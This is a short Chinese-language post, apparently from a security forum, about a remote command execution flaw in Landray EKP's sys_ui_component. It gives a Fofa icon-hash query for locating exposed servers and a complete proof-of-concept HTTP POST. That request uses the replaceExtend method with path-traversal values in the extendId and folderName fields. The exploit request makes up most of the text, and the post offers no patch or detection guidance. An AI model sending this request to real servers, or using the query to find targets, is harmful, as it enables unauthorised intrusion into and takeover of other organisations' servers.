蓝凌 EKP sys_ui_component 远程命令执行漏洞,攻击者可通过此漏洞上传恶意脚本文件,对服务器的正常运行造成安全威胁。
Fofa语句:
icon_hash="831854882"
POC:
POST /sys/ui/sys_ui_component/sysUiComponent.do HTTP/1.1
Host:xx.xx.xx.xx
Accept:application/json,text/javascript,*/*;q=0.01
Accept-Encoding:gzip,deflate
Accept-Language:zh-CN,zh;q=0.9,en;q=0.8
Connection:close
Content-Type:multipart/form-data; boundary=----WebKitFormBoundaryL7ILSpOdIhIIvL51
User-Agent:Mozilla/5.0(WindowsNT10.0;Win64;x64)AppleWebKit/537.36(KHTML,likeGecko)Chrome/83.0.4103.116Safari/537.36
X-Requested-With:XMLHttpRequest
Content-Length: 395
------WebKitFormBoundaryL7ILSpOdIhIIvL51
Content-Disposition:form-data;name="method"
replaceExtend
------WebKitFormBoundaryL7ILSpOdIhIIvL51
Content-Disposition:form-data;name="extendId"
../../../../resource/help/km/review/
------WebKitFormBoundaryL7ILSpOdIhIIvL51
Content-Disposition:form-data;name="folderName"
../../../ekp/sys/common
------WebKitFormBoundaryL7ILSpOdIhIIvL51--
没有回复内容